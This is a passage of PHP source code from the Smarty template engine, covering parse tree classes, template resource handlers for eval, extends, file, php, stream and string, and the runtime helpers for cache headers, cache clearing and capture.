    }

    /**
     * Return buffer content
     *
     * @param \Smarty_Internal_Templateparser $parser
     *
     * @return string content
     */
    public function to_smarty_php(Smarty_Internal_Templateparser $parser)
    {
        return $this->data;
    }

    /**
     * Return complied code that loads the evaluated output of buffer content into a temporary variable
     *
     * @param \Smarty_Internal_Templateparser $parser
     *
     * @return string template code
     */
    public function assign_to_var(Smarty_Internal_Templateparser $parser)
    {
        $var = $parser->compiler->getNewPrefixVariable();
        $tmp = $parser->compiler->appendCode('<?php ob_start();?>', $this->data);
        $tmp = $parser->compiler->appendCode($tmp, "<?php {$var}=ob_get_clean();?>");
        $parser->compiler->prefix_code[] = sprintf('%s', $tmp);
        return $var;
    }
}
<?php
/**
 * Smarty Internal Plugin Templateparser Parse Tree
 * These are classes to build parse tree in the template parser
 *
 * @package    Smarty
 * @subpackage Compiler
 * @author     Thue Kristensen
 * @author     Uwe Tews
 */

/**
 * Template element
 *
 * @package    Smarty
 * @subpackage Compiler
 * @ignore
 */
class Smarty_Internal_ParseTree_Template extends Smarty_Internal_ParseTree
{
    /**
     * Array of template elements
     *
     * @var array
     */
    public $subtrees = array();

    /**
     * Create root of parse tree for template elements
     */
    public function __construct()
    {
    }

    /**
     * Append buffer to subtree
     *
     * @param \Smarty_Internal_Templateparser $parser
     * @param Smarty_Internal_ParseTree       $subtree
     */
    public function append_subtree(Smarty_Internal_Templateparser $parser, Smarty_Internal_ParseTree $subtree)
    {
        if (!empty($subtree->subtrees)) {
            $this->subtrees = array_merge($this->subtrees, $subtree->subtrees);
        } else {
            if ($subtree->data !== '') {
                $this->subtrees[] = $subtree;
            }
        }
    }

    /**
     * Append array to subtree
     *
     * @param \Smarty_Internal_Templateparser $parser
     * @param \Smarty_Internal_ParseTree[]    $array
     */
    public function append_array(Smarty_Internal_Templateparser $parser, $array = array())
    {
        if (!empty($array)) {
            $this->subtrees = array_merge($this->subtrees, (array)$array);
        }
    }

    /**
     * Prepend array to subtree
     *
     * @param \Smarty_Internal_Templateparser $parser
     * @param \Smarty_Internal_ParseTree[]    $array
     */
    public function prepend_array(Smarty_Internal_Templateparser $parser, $array = array())
    {
        if (!empty($array)) {
            $this->subtrees = array_merge((array)$array, $this->subtrees);
        }
    }

    /**
     * Sanitize and merge subtree buffers together
     *
     * @param \Smarty_Internal_Templateparser $parser
     *
     * @return string template code content
     */
    public function to_smarty_php(Smarty_Internal_Templateparser $parser)
    {
        $code = '';

        foreach ($this->getChunkedSubtrees() as $chunk) {
            $text = '';
            switch ($chunk['mode']) {
                case 'textstripped':
                    foreach ($chunk['subtrees'] as $subtree) {
                        $text .= $subtree->to_smarty_php($parser);
                    }
                    $code .= preg_replace(
                        '/((<%)|(%>)|(<\?php)|(<\?)|(\?>)|(<\/?script))/',
                        "<?php echo '\$1'; ?>\n",
                        $parser->compiler->processText($text)
                    );
                    break;
                case 'text':
                    foreach ($chunk['subtrees'] as $subtree) {
                        $text .= $subtree->to_smarty_php($parser);
                    }
                    $code .= preg_replace(
                        '/((<%)|(%>)|(<\?php)|(<\?)|(\?>)|(<\/?script))/',
                        "<?php echo '\$1'; ?>\n",
                        $text
                    );
                    break;
                case 'tag':
                    foreach ($chunk['subtrees'] as $subtree) {
                        $text = $parser->compiler->appendCode($text, $subtree->to_smarty_php($parser));
                    }
                    $code .= $text;
                    break;
                default:
                    foreach ($chunk['subtrees'] as $subtree) {
                        $text = $subtree->to_smarty_php($parser);
                    }
                    $code .= $text;

            }
        }
        return $code;
    }

    private function getChunkedSubtrees() {
        $chunks = array();
        $currentMode = null;
        $currentChunk = array();
        for ($key = 0, $cnt = count($this->subtrees); $key < $cnt; $key++) {

            if ($this->subtrees[ $key ]->data === '' && in_array($currentMode, array('textstripped', 'text', 'tag'))) {
                continue;
            }

            if ($this->subtrees[ $key ] instanceof Smarty_Internal_ParseTree_Text
                && $this->subtrees[ $key ]->isToBeStripped()) {
                $newMode = 'textstripped';
            } elseif ($this->subtrees[ $key ] instanceof Smarty_Internal_ParseTree_Text) {
                $newMode = 'text';
            } elseif ($this->subtrees[ $key ] instanceof Smarty_Internal_ParseTree_Tag) {
                $newMode = 'tag';
            } else {
                $newMode = 'other';
            }

            if ($newMode == $currentMode) {
                $currentChunk[] = $this->subtrees[ $key ];
            } else {
                $chunks[] = array(
                    'mode' => $currentMode,
                    'subtrees' => $currentChunk
                );
                $currentMode = $newMode;
                $currentChunk = array($this->subtrees[ $key ]);
            }
        }
        if ($currentMode && $currentChunk) {
            $chunks[] = array(
                'mode' => $currentMode,
                'subtrees' => $currentChunk
            );
        }
        return $chunks;
    }
}
<?php

/**
 * Smarty Internal Plugin Templateparser Parse Tree
 * These are classes to build parse tree in the template parser
 *
 * @package    Smarty
 * @subpackage Compiler
 * @author     Thue Kristensen
 * @author     Uwe Tews
 *             *
 *             template text
 * @package    Smarty
 * @subpackage Compiler
 * @ignore
 */
class Smarty_Internal_ParseTree_Text extends Smarty_Internal_ParseTree
{

    /**
     * Wether this section should be stripped on output to smarty php
     * @var bool
     */
    private $toBeStripped = false;

    /**
     * Create template text buffer
     *
     * @param string $data text
     * @param bool $toBeStripped wether this section should be stripped on output to smarty php
     */
    public function __construct($data, $toBeStripped = false)
    {
        $this->data = $data;
        $this->toBeStripped = $toBeStripped;
    }

    /**
     * Wether this section should be stripped on output to smarty php
     * @return bool
     */
    public function isToBeStripped() {
        return $this->toBeStripped;
    }

    /**
     * Return buffer content
     *
     * @param \Smarty_Internal_Templateparser $parser
     *
     * @return string text
     */
    public function to_smarty_php(Smarty_Internal_Templateparser $parser)
    {
        return $this->data;
    }
}
<?php
/**
 * Smarty Internal Plugin Resource Eval
 *
 * @package    Smarty
 * @subpackage TemplateResources
 * @author     Uwe Tews
 * @author     Rodney Rehm
 */

/**
 * Smarty Internal Plugin Resource Eval
 * Implements the strings as resource for Smarty template
 * {@internal unlike string-resources the compiled state of eval-resources is NOT saved for subsequent access}}
 *
 * @package    Smarty
 * @subpackage TemplateResources
 */
class Smarty_Internal_Resource_Eval extends Smarty_Resource_Recompiled
{
    /**
     * populate Source Object with meta data from Resource
     *
     * @param Smarty_Template_Source   $source    source object
     * @param Smarty_Internal_Template|null $_template template object
     *
     * @return void
     */
    public function populate(Smarty_Template_Source $source, ?Smarty_Internal_Template $_template = null)
    {
        $source->uid = $source->filepath = sha1($source->name);
        $source->timestamp = $source->exists = true;
    }

    /**
     * Load template's source from $resource_name into current template object
     *
     * @uses decode() to decode base64 and urlencoded template_resources
     *
     * @param Smarty_Template_Source $source source object
     *
     * @return string                 template source
     */
    public function getContent(Smarty_Template_Source $source)
    {
        return $this->decode($source->name);
    }

    /**
     * decode base64 and urlencode
     *
     * @param string $string template_resource to decode
     *
     * @return string decoded template_resource
     */
    protected function decode($string)
    {
        // decode if specified
        if (($pos = strpos($string, ':')) !== false) {
            if (!strncmp($string, 'base64', 6)) {
                return base64_decode(substr($string, 7));
            } elseif (!strncmp($string, 'urlencode', 9)) {
                return urldecode(substr($string, 10));
            }
        }
        return $string;
    }

    /**
     * modify resource_name according to resource handlers specifications
     *
     * @param Smarty  $smarty        Smarty instance
     * @param string  $resource_name resource_name to make unique
     * @param boolean $isConfig      flag for config resource
     *
     * @return string unique resource name
     */
    public function buildUniqueResourceName(Smarty $smarty, $resource_name, $isConfig = false)
    {
        return get_class($this) . '#' . $this->decode($resource_name);
    }

    /**
     * Determine basename for compiled filename
     *
     * @param Smarty_Template_Source $source source object
     *
     * @return string                 resource's basename
     */
    public function getBasename(Smarty_Template_Source $source)
    {
        return '';
    }
}
<?php
/**
 * Smarty Internal Plugin Resource Extends
 *
 * @package    Smarty
 * @subpackage TemplateResources
 * @author     Uwe Tews
 * @author     Rodney Rehm
 */

/**
 * Smarty Internal Plugin Resource Extends
 * Implements the file system as resource for Smarty which {extend}s a chain of template files templates
 *
 * @package    Smarty
 * @subpackage TemplateResources
 */
class Smarty_Internal_Resource_Extends extends Smarty_Resource
{
    /**
     * mbstring.overload flag
     *
     * @var int
     */
    public $mbstring_overload = 0;

    /**
     * populate Source Object with meta data from Resource
     *
     * @param Smarty_Template_Source   $source    source object
     * @param Smarty_Internal_Template|null $_template template object
     *
     * @throws SmartyException
     */
    public function populate(Smarty_Template_Source $source, ?Smarty_Internal_Template $_template = null)
    {
        $uid = '';
        $sources = array();
        $components = explode('|', $source->name);
        $smarty = &$source->smarty;
        $exists = true;
        foreach ($components as $component) {
            /* @var \Smarty_Template_Source $_s */
            $_s = Smarty_Template_Source::load(null, $smarty, $component);
            if ($_s->type === 'php') {
                throw new SmartyException("Resource type {$_s->type} cannot be used with the extends resource type");
            }
            $sources[ $_s->uid ] = $_s;
            $uid .= $_s->filepath;
            if ($_template) {
                $exists = $exists && $_s->exists;
            }
        }
        $source->components = $sources;
        $source->filepath = $_s->filepath;
        $source->uid = sha1($uid . $source->smarty->_joined_template_dir);
        $source->exists = $exists;
        if ($_template) {
            $source->timestamp = $_s->timestamp;
        }
    }

    /**
     * populate Source Object with timestamp and exists from Resource
     *
     * @param Smarty_Template_Source $source source object
     */
    public function populateTimestamp(Smarty_Template_Source $source)
    {
        $source->exists = true;
        /* @var \Smarty_Template_Source $_s */
        foreach ($source->components as $_s) {
            $source->exists = $source->exists && $_s->exists;
        }
        $source->timestamp = $source->exists ? $_s->getTimeStamp() : false;
    }

    /**
     * Load template's source from files into current template object
     *
     * @param Smarty_Template_Source $source source object
     *
     * @return string template source
     * @throws SmartyException if source cannot be loaded
     */
    public function getContent(Smarty_Template_Source $source)
    {
        if (!$source->exists) {
            throw new SmartyException("Unable to load template '{$source->type}:{$source->name}'");
        }
        $_components = array_reverse($source->components);
        $_content = '';
        /* @var \Smarty_Template_Source $_s */
        foreach ($_components as $_s) {
            // read content
            $_content .= $_s->getContent();
        }
        return $_content;
    }

    /**
     * Determine basename for compiled filename
     *
     * @param Smarty_Template_Source $source source object
     *
     * @return string resource's basename
     */
    public function getBasename(Smarty_Template_Source $source)
    {
        return str_replace(':', '.', basename($source->filepath));
    }

    /*
      * Disable timestamp checks for extends resource.
      * The individual source components will be checked.
      *
      * @return bool
      */
    /**
     * @return bool
     */
    public function checkTimestamps()
    {
        return false;
    }
}
<?php
/**
 * Smarty Internal Plugin Resource File
 *
 * @package    Smarty
 * @subpackage TemplateResources
 * @author     Uwe Tews
 * @author     Rodney Rehm
 */

/**
 * Smarty Internal Plugin Resource File
 * Implements the file system as resource for Smarty templates
 *
 * @package    Smarty
 * @subpackage TemplateResources
 */
class Smarty_Internal_Resource_File extends Smarty_Resource
{
    /**
     * populate Source Object with meta data from Resource
     *
     * @param Smarty_Template_Source   $source    source object
     * @param Smarty_Internal_Template|null $_template template object
     *
     * @throws \SmartyException
     */
    public function populate(Smarty_Template_Source $source, ?Smarty_Internal_Template $_template = null)
    {
        $source->filepath = $this->buildFilepath($source, $_template);
        if ($source->filepath !== false) {
            if (isset($source->smarty->security_policy) && is_object($source->smarty->security_policy)) {
                $source->smarty->security_policy->isTrustedResourceDir($source->filepath, $source->isConfig);
            }
            $source->exists = true;
            $source->uid = sha1(
                $source->filepath . ($source->isConfig ? $source->smarty->_joined_config_dir :
                    $source->smarty->_joined_template_dir)
            );
            $source->timestamp = filemtime($source->filepath);
        } else {
            $source->timestamp = $source->exists = false;
        }
    }

    /**
     * populate Source Object with timestamp and exists from Resource
     *
     * @param Smarty_Template_Source $source source object
     */
    public function populateTimestamp(Smarty_Template_Source $source)
    {
        if (!$source->exists) {
            $source->timestamp = $source->exists = is_file($source->filepath);
        }
        if ($source->exists) {
            $source->timestamp = filemtime($source->filepath);
        }
    }

    /**
     * Load template's source from file into current template object
     *
     * @param Smarty_Template_Source $source source object
     *
     * @return string                 template source
     * @throws SmartyException        if source cannot be loaded
     */
    public function getContent(Smarty_Template_Source $source)
    {
        if ($source->exists) {
            return file_get_contents($source->filepath);
        }
        throw new SmartyException(
            'Unable to read ' . ($source->isConfig ? 'config' : 'template') .
            " {$source->type} '{$source->name}'"
        );
    }

    /**
     * Determine basename for compiled filename
     *
     * @param Smarty_Template_Source $source source object
     *
     * @return string                 resource's basename
     */
    public function getBasename(Smarty_Template_Source $source)
    {
        return basename($source->filepath);
    }

    /**
     * build template filepath by traversing the template_dir array
     *
     * @param Smarty_Template_Source   $source    source object
     * @param Smarty_Internal_Template|null $_template template object
     *
     * @return string fully qualified filepath
     * @throws SmartyException
     */
    protected function buildFilepath(Smarty_Template_Source $source, ?Smarty_Internal_Template $_template = null)
    {
        $file = $source->name;
        // absolute file ?
        if ($file[ 0 ] === '/' || $file[ 1 ] === ':') {
            $file = $source->smarty->_realpath($file, true);
            return is_file($file) ? $file : false;
        }
        // go relative to a given template?
        if ($file[ 0 ] === '.' && $_template && $_template->_isSubTpl()
            && preg_match('#^[.]{1,2}[\\\/]#', $file)
        ) {
            if ($_template->parent->source->type !== 'file' && $_template->parent->source->type !== 'extends'
                && !isset($_template->parent->_cache[ 'allow_relative_path' ])
            ) {
                throw new SmartyException("Template '{$file}' cannot be relative to template of resource type '{$_template->parent->source->type}'");
            }
            // normalize path
            $path =
                $source->smarty->_realpath(dirname($_template->parent->source->filepath) . DIRECTORY_SEPARATOR . $file);
            // files relative to a template only get one shot
            return is_file($path) ? $path : false;
        }
        // normalize DIRECTORY_SEPARATOR
        if (strpos($file, DIRECTORY_SEPARATOR === '/' ? '\\' : '/') !== false) {
            $file = str_replace(DIRECTORY_SEPARATOR === '/' ? '\\' : '/', DIRECTORY_SEPARATOR, $file);
        }
        $_directories = $source->smarty->getTemplateDir(null, $source->isConfig);
        // template_dir index?
        if ($file[ 0 ] === '[' && preg_match('#^\[([^\]]+)\](.+)$#', $file, $fileMatch)) {
            $file = $fileMatch[ 2 ];
            $_indices = explode(',', $fileMatch[ 1 ]);
            $_index_dirs = array();
            foreach ($_indices as $index) {
                $index = trim($index);
                // try string indexes
                if (isset($_directories[ $index ])) {
                    $_index_dirs[] = $_directories[ $index ];
                } elseif (is_numeric($index)) {
                    // try numeric index
                    $index = (int)$index;
                    if (isset($_directories[ $index ])) {
                        $_index_dirs[] = $_directories[ $index ];
                    } else {
                        // try at location index
                        $keys = array_keys($_directories);
                        if (isset($_directories[ $keys[ $index ] ])) {
                            $_index_dirs[] = $_directories[ $keys[ $index ] ];
                        }
                    }
                }
            }
            if (empty($_index_dirs)) {
                // index not found
                return false;
            } else {
                $_directories = $_index_dirs;
            }
        }
        // relative file name?
        foreach ($_directories as $_directory) {
            $path = $_directory . $file;
            if (is_file($path)) {
                return (strpos($path, '.' . DIRECTORY_SEPARATOR) !== false) ? $source->smarty->_realpath($path) : $path;
            }
        }
        if (!isset($_index_dirs)) {
            // Could be relative to cwd
            $path = $source->smarty->_realpath($file, true);
            if (is_file($path)) {
                return $path;
            }
        }
        // Use include path ?
        if ($source->smarty->use_include_path) {
            return $source->smarty->ext->_getIncludePath->getIncludePath($_directories, $file, $source->smarty);
        }
        return false;
    }
}
<?php

/**
 * Smarty Internal Plugin Resource PHP
 * Implements the file system as resource for PHP templates
 *
 * @package    Smarty
 * @subpackage TemplateResources
 * @author     Uwe Tews
 * @author     Rodney Rehm
 */
class Smarty_Internal_Resource_Php extends Smarty_Internal_Resource_File
{
    /**
     * Flag that it's an uncompiled resource
     *
     * @var bool
     */
    public $uncompiled = true;

    /**
     * Resource does implement populateCompiledFilepath() method
     *
     * @var bool
     */
    public $hasCompiledHandler = true;

    /**
     * container for short_open_tag directive's value before executing PHP templates
     *
     * @var string
     */
    protected $short_open_tag;

    /**
     * Create a new PHP Resource
     */
    public function __construct()
    {
        $this->short_open_tag = function_exists('ini_get') ? ini_get('short_open_tag') : 1;
    }

    /**
     * Load template's source from file into current template object
     *
     * @param Smarty_Template_Source $source source object
     *
     * @return string                 template source
     * @throws SmartyException        if source cannot be loaded
     */
    public function getContent(Smarty_Template_Source $source)
    {
        if ($source->exists) {
            return '';
        }
        throw new SmartyException("Unable to read template {$source->type} '{$source->name}'");
    }

    /**
     * populate compiled object with compiled filepath
     *
     * @param Smarty_Template_Compiled $compiled  compiled object
     * @param Smarty_Internal_Template $_template template object (is ignored)
     */
    public function populateCompiledFilepath(Smarty_Template_Compiled $compiled, Smarty_Internal_Template $_template)
    {
        $compiled->filepath = $_template->source->filepath;
        $compiled->timestamp = $_template->source->timestamp;
        $compiled->exists = $_template->source->exists;
        $compiled->file_dependency[ $_template->source->uid ] =
            array(
                $compiled->filepath,
                $compiled->timestamp,
                $_template->source->type,
            );
    }

    /**
     * Render and output the template (without using the compiler)
     *
     * @param Smarty_Template_Source   $source    source object
     * @param Smarty_Internal_Template $_template template object
     *
     * @return void
     * @throws SmartyException          if template cannot be loaded or allow_php_templates is disabled
     */
    public function renderUncompiled(Smarty_Template_Source $source, Smarty_Internal_Template $_template)
    {
        if (!$source->smarty->allow_php_templates) {
            throw new SmartyException('PHP templates are disabled');
        }
        if (!$source->exists) {
            throw new SmartyException(
                "Unable to load template '{$source->type}:{$source->name}'" .
                ($_template->_isSubTpl() ? " in '{$_template->parent->template_resource}'" : '')
            );
        }
        // prepare variables
        extract($_template->getTemplateVars());
        // include PHP template with short open tags enabled
        if (function_exists('ini_set')) {
            ini_set('short_open_tag', '1');
        }
        /**
         *
         *
         * @var Smarty_Internal_Template $_smarty_template
         * used in included file
         */
        $_smarty_template = $_template;
        include $source->filepath;
        if (function_exists('ini_set')) {
            ini_set('short_open_tag', $this->short_open_tag);
        }
    }
}
<?php
/**
 * Smarty Internal Plugin Resource Stream
 * Implements the streams as resource for Smarty template
 *
 * @package    Smarty
 * @subpackage TemplateResources
 * @author     Uwe Tews
 * @author     Rodney Rehm
 */

/**
 * Smarty Internal Plugin Resource Stream
 * Implements the streams as resource for Smarty template
 *
 * @link       https://php.net/streams
 * @package    Smarty
 * @subpackage TemplateResources
 */
class Smarty_Internal_Resource_Stream extends Smarty_Resource_Recompiled
{
    /**
     * populate Source Object with meta data from Resource
     *
     * @param Smarty_Template_Source   $source    source object
     * @param Smarty_Internal_Template|null $_template template object
     *
     * @return void
     */
    public function populate(Smarty_Template_Source $source, ?Smarty_Internal_Template $_template = null)
    {
        if (strpos($source->resource, '://') !== false) {
            $source->filepath = $source->resource;
        } else {
            $source->filepath = str_replace(':', '://', $source->resource);
        }
        $source->uid = false;
        $source->content = $this->getContent($source);
        $source->timestamp = $source->exists = !!$source->content;
    }

    /**
     * Load template's source from stream into current template object
     *
     * @param Smarty_Template_Source $source source object
     *
     * @return string template source
     */
    public function getContent(Smarty_Template_Source $source)
    {
        $t = '';
        // the availability of the stream has already been checked in Smarty_Resource::fetch()
        $fp = fopen($source->filepath, 'r+');
        if ($fp) {
            while (!feof($fp) && ($current_line = fgets($fp)) !== false) {
                $t .= $current_line;
            }
            fclose($fp);
            return $t;
        } else {
            return false;
        }
    }

    /**
     * modify resource_name according to resource handlers specifications
     *
     * @param Smarty  $smarty        Smarty instance
     * @param string  $resource_name resource_name to make unique
     * @param boolean $isConfig      flag for config resource
     *
     * @return string unique resource name
     */
    public function buildUniqueResourceName(Smarty $smarty, $resource_name, $isConfig = false)
    {
        return get_class($this) . '#' . $resource_name;
    }
}
<?php
/**
 * Smarty Internal Plugin Resource String
 *
 * @package    Smarty
 * @subpackage TemplateResources
 * @author     Uwe Tews
 * @author     Rodney Rehm
 */

/**
 * Smarty Internal Plugin Resource String
 * Implements the strings as resource for Smarty template
 * {@internal unlike eval-resources the compiled state of string-resources is saved for subsequent access}}
 *
 * @package    Smarty
 * @subpackage TemplateResources
 */
class Smarty_Internal_Resource_String extends Smarty_Resource
{
    /**
     * populate Source Object with meta data from Resource
     *
     * @param Smarty_Template_Source   $source    source object
     * @param Smarty_Internal_Template|null $_template template object
     *
     * @return void
     */
    public function populate(Smarty_Template_Source $source, ?Smarty_Internal_Template $_template = null)
    {
        $source->uid = $source->filepath = sha1($source->name . $source->smarty->_joined_template_dir);
        $source->timestamp = $source->exists = true;
    }

    /**
     * Load template's source from $resource_name into current template object
     *
     * @uses decode() to decode base64 and urlencoded template_resources
     *
     * @param Smarty_Template_Source $source source object
     *
     * @return string                 template source
     */
    public function getContent(Smarty_Template_Source $source)
    {
        return $this->decode($source->name);
    }

    /**
     * decode base64 and urlencode
     *
     * @param string $string template_resource to decode
     *
     * @return string decoded template_resource
     */
    protected function decode($string)
    {
        // decode if specified
        if (($pos = strpos($string, ':')) !== false) {
            if (!strncmp($string, 'base64', 6)) {
                return base64_decode(substr($string, 7));
            } elseif (!strncmp($string, 'urlencode', 9)) {
                return urldecode(substr($string, 10));
            }
        }
        return $string;
    }

    /**
     * modify resource_name according to resource handlers specifications
     *
     * @param Smarty  $smarty        Smarty instance
     * @param string  $resource_name resource_name to make unique
     * @param boolean $isConfig      flag for config resource
     *
     * @return string unique resource name
     */
    public function buildUniqueResourceName(Smarty $smarty, $resource_name, $isConfig = false)
    {
        return get_class($this) . '#' . $this->decode($resource_name);
    }

    /**
     * Determine basename for compiled filename
     * Always returns an empty string.
     *
     * @param Smarty_Template_Source $source source object
     *
     * @return string                 resource's basename
     */
    public function getBasename(Smarty_Template_Source $source)
    {
        return '';
    }

    /*
        * Disable timestamp checks for string resource.
        *
        * @return bool
        */
    /**
     * @return bool
     */
    public function checkTimestamps()
    {
        return false;
    }
}
<?php

/**
 * Inline Runtime Methods render, setSourceByUid, setupSubTemplate
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 **/
class Smarty_Internal_Runtime_CacheModify
{
    /**
     * check client side cache
     *
     * @param \Smarty_Template_Cached   $cached
     * @param \Smarty_Internal_Template $_template
     * @param string                    $content
     *
     * @throws \Exception
     * @throws \SmartyException
     */
    public function cacheModifiedCheck(Smarty_Template_Cached $cached, Smarty_Internal_Template $_template, $content)
    {
        $_isCached = $_template->isCached() && !$_template->compiled->has_nocache_code;
        $_last_modified_date =
            @substr($_SERVER[ 'HTTP_IF_MODIFIED_SINCE' ], 0, strpos($_SERVER[ 'HTTP_IF_MODIFIED_SINCE' ], 'GMT') + 3);
        if ($_isCached && $cached->timestamp <= strtotime($_last_modified_date)) {
            switch (PHP_SAPI) {
                case 'cgi': // php-cgi < 5.3
                case 'cgi-fcgi': // php-cgi >= 5.3
                case 'fpm-fcgi': // php-fpm >= 5.3.3
                    header('Status: 304 Not Modified');
                    break;
                case 'cli':
                    if (/* ^phpunit */
                    !empty($_SERVER[ 'SMARTY_PHPUNIT_DISABLE_HEADERS' ]) /* phpunit$ */
                    ) {
                        $_SERVER[ 'SMARTY_PHPUNIT_HEADERS' ][] = '304 Not Modified';
                    }
                    break;
                default:
                    if (/* ^phpunit */
                    !empty($_SERVER[ 'SMARTY_PHPUNIT_DISABLE_HEADERS' ]) /* phpunit$ */
                    ) {
                        $_SERVER[ 'SMARTY_PHPUNIT_HEADERS' ][] = '304 Not Modified';
                    } else {
                        header($_SERVER[ 'SERVER_PROTOCOL' ] . ' 304 Not Modified');
                    }
                    break;
            }
        } else {
            switch (PHP_SAPI) {
                case 'cli':
                    if (/* ^phpunit */
                    !empty($_SERVER[ 'SMARTY_PHPUNIT_DISABLE_HEADERS' ]) /* phpunit$ */
                    ) {
                        $_SERVER[ 'SMARTY_PHPUNIT_HEADERS' ][] =
                            'Last-Modified: ' . gmdate('D, d M Y H:i:s', $cached->timestamp) . ' GMT';
                    }
                    break;
                default:
                    header('Last-Modified: ' . gmdate('D, d M Y H:i:s', $cached->timestamp) . ' GMT');
                    break;
            }
            echo $content;
        }
    }
}
<?php
/**
 * Smarty cache resource file clear method
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 */

/**
 * Smarty Internal Runtime Cache Resource File Class
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 */
class Smarty_Internal_Runtime_CacheResourceFile
{
    /**
     * Empty cache for a specific template
     *
     * @param Smarty  $smarty
     * @param string  $resource_name template name
     * @param string  $cache_id      cache id
     * @param string  $compile_id    compile id
     * @param integer $exp_time      expiration time (number of seconds, not timestamp)
     *
     * @return integer number of cache files deleted
     */
    public function clear(Smarty $smarty, $resource_name, $cache_id, $compile_id, $exp_time)
    {
        $_cache_id = isset($cache_id) ? preg_replace('![^\w\|]+!', '_', $cache_id) : null;
        $_compile_id = isset($compile_id) ? preg_replace('![^\w]+!', '_', $compile_id) : null;
        $_dir_sep = $smarty->use_sub_dirs ? '/' : '^';
        $_compile_id_offset = $smarty->use_sub_dirs ? 3 : 0;
        $_dir = $smarty->getCacheDir();
        if ($_dir === '/') { //We should never want to delete this!
            return 0;
        }
        $_dir_length = strlen($_dir);
        if (isset($_cache_id)) {
            $_cache_id_parts = explode('|', $_cache_id);
            $_cache_id_parts_count = count($_cache_id_parts);
            if ($smarty->use_sub_dirs) {
                foreach ($_cache_id_parts as $id_part) {
                    $_dir .= $id_part . '/';
                }
            }
        }
        if (isset($resource_name)) {
            $_save_stat = $smarty->caching;
            $smarty->caching = Smarty::CACHING_LIFETIME_CURRENT;
            $tpl = new $smarty->template_class($resource_name, $smarty);
            $smarty->caching = $_save_stat;
            // remove from template cache
            $tpl->source; // have the template registered before unset()
            if ($tpl->source->exists) {
                $_resourcename_parts = basename(str_replace('^', '/', $tpl->cached->filepath));
            } else {
                return 0;
            }
        }
        $_count = 0;
        $_time = time();
        if (file_exists($_dir)) {
            $_cacheDirs = new RecursiveDirectoryIterator($_dir);
            $_cache = new RecursiveIteratorIterator($_cacheDirs, RecursiveIteratorIterator::CHILD_FIRST);
            foreach ($_cache as $_file) {
                if (substr(basename($_file->getPathname()), 0, 1) === '.') {
                    continue;
                }
                $_filepath = (string)$_file;
                // directory ?
                if ($_file->isDir()) {
                    if (!$_cache->isDot()) {
                        // delete folder if empty
                        @rmdir($_file->getPathname());
                    }
                } else {
                    // delete only php files
                    if (substr($_filepath, -4) !== '.php') {
                        continue;
                    }
                    $_parts = explode($_dir_sep, str_replace('\\', '/', substr($_filepath, $_dir_length)));
                    $_parts_count = count($_parts);
                    // check name
                    if (isset($resource_name)) {
                        if ($_parts[ $_parts_count - 1 ] !== $_resourcename_parts) {
                            continue;
                        }
                    }
                    // check compile id
                    if (isset($_compile_id) && (!isset($_parts[ $_parts_count - 2 - $_compile_id_offset ])
                                                || $_parts[ $_parts_count - 2 - $_compile_id_offset ] !== $_compile_id)
                    ) {
                        continue;
                    }
                    // check cache id
                    if (isset($_cache_id)) {
                        // count of cache id parts
                        $_parts_count = (isset($_compile_id)) ? $_parts_count - 2 - $_compile_id_offset :
                            $_parts_count - 1 - $_compile_id_offset;
                        if ($_parts_count < $_cache_id_parts_count) {
                            continue;
                        }
                        for ($i = 0; $i < $_cache_id_parts_count; $i++) {
                            if ($_parts[ $i ] !== $_cache_id_parts[ $i ]) {
                                continue 2;
                            }
                        }
                    }
                    if (is_file($_filepath)) {
                        // expired ?
                        if (isset($exp_time)) {
                            if ($exp_time < 0) {
                                preg_match('#\'cache_lifetime\' =>\s*(\d*)#', file_get_contents($_filepath), $match);
                                if ($_time < (filemtime($_filepath) + $match[ 1 ])) {
                                    continue;
                                }
                            } else {
                                if ($_time - filemtime($_filepath) < $exp_time) {
                                    continue;
                                }
                            }
                        }
                        $_count += @unlink($_filepath) ? 1 : 0;
                        if (function_exists('opcache_invalidate')
                            && (!function_exists('ini_get') || strlen(ini_get("opcache.restrict_api")) < 1)
                        ) {
                            opcache_invalidate($_filepath, true);
                        } elseif (function_exists('apc_delete_file')) {
                            apc_delete_file($_filepath);
                        }
                    }
                }
            }
        }
        return $_count;
    }
}
<?php

/**
 * Runtime Extension Capture
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 */
class Smarty_Internal_Runtime_Capture
{
    /**
     * Flag that this instance  will not be cached
     *
     * @var bool
     */
    public $isPrivateExtension = true;

    /**
     * Stack of capture parameter
     *
     * @var array
     */
    private $captureStack = array();

    /**
     * Current open capture sections
     *
     * @var int
     */
    private $captureCount = 0;

    /**
     * Count stack
     *
     * @var int[]
     */
    private $countStack = array();

    /**
     * Named buffer
     *
     * @var string[]
     */
    private $namedBuffer = array();

    /**
     * Flag if callbacks are registered
     *
     * @var bool
     */
    private $isRegistered = false;

    /**
     * Open capture section
     *
     * @param \Smarty_Internal_Template $_template
     * @param string                    $buffer capture name
     * @param string                    $assign variable name
     * @param string                    $append variable name
     */
    public function open(Smarty_Internal_Template $_template, $buffer, $assign, $append)
    {
        if (!$this->isRegistered) {
            $this->register($_template);
        }
        $this->captureStack[] = array(
            $buffer,
            $assign,
            $append
        );
        $this->captureCount++;
        ob_start();
    }

    /**
     * Register callbacks in template class
     *
     * @param \Smarty_Internal_Template $_template
     */
    private function register(Smarty_Internal_Template $_template)
    {
        $_template->startRenderCallbacks[] = array(
            $this,
            'startRender'
        );
        $_template->endRenderCallbacks[] = array(
            $this,
            'endRender'
        );
        $this->startRender($_template);
        $this->isRegistered = true;
    }

    /**
     * Start render callback
     *
     * @param \Smarty_Internal_Template $_template
     */
    public function startRender(Smarty_Internal_Template $_template)
    {
        $this->countStack[] = $this->captureCount;
        $this->captureCount = 0;
    }

    /**
     * Close capture section
     *
     * @param \Smarty_Internal_Template $_template
     *
     * @throws \SmartyException
     */
    public function close(Smarty_Internal_Template $_template)
    {
        if ($this->captureCount) {
            list($buffer, $assign, $append) = array_pop($this->captureStack);
            $this->captureCount--;
            if (isset($assign)) {
                $_template->assign($assign, ob_get_contents());
            }
            if (isset($append)) {
                $_template->append($append, ob_get_contents());
            }
            $this->namedBuffer[ $buffer ] = ob_get_clean();
        } else {
            $this->error($_template);
        }
    }

    /**
     * Error exception on not matching {capture}{/capture}
     *
     * @param \Smarty_Internal_Template $_template
     *
     * @throws \SmartyException
     */
    public function error(Smarty_Internal_Template $_template)
    {
